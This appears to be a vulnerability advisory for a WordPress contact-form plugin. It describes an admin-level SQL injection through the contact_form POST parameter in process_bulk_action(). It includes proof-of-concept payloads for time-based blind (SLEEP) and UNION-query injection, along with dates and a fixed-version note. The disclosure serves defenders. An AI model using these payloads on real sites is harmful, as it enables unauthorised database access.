The plugin did not properly sanitise the form_ids from the contact_form POST array parameter before using them in a SQL statement in the process_bulk_action() function. This could allow high privilege users, such as admin to perform SQL Injection against the DBMS via the bulk actions: delete, read and unread. Note: Further SQL Injections have been fixed in 1.2.5.7.
--- Parameter: #1* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: s=&_wpnonce=16a6b55ed1&contact_form[]=1 AND (SELECT 4559 FROM (SELECT(SLEEP(5)))BVdc)&action2=-1 Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: s=&_wpnonce=16a6b55ed1&contact_form[]=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a7a7171,0x545942474c4e416e6864774d4c756c6f684d7569456150706b756f7a465a487173704c476b465243,0x71716b7871),NULL-- -&action2=-1 ---
Yes
2021-01-21 (about 2 years ago)
2021-01-21 (about 2 years ago)
2021-01-25 (about 2 years ago)